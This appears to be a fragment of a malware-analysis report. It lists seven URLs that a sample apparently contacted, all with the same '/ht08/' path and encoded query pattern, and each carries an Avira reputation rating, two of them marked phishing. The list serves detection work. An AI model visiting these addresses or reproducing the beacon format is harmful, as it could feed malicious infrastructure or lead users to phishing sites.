http://www.septemberstockevent200.com/ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH true
  • Avira URL Cloud: safe
 unknown
http://www.joye.club/ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH false
  • Avira URL Cloud: phishing
 unknown
http://www.maikoufarm.com/ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH true
  • Avira URL Cloud: safe
 unknown
http://www.miabellavita.com/ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH true
  • Avira URL Cloud: safe
 unknown
http://www.mattlambert.xyz/ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH false
  • Avira URL Cloud: phishing
 unknown
http://www.sharpstead.com/ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH true
  • Avira URL Cloud: safe
 unknown
http://www.mmj0115.xyz/ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH true
  • Avira URL Cloud: safe
 unknown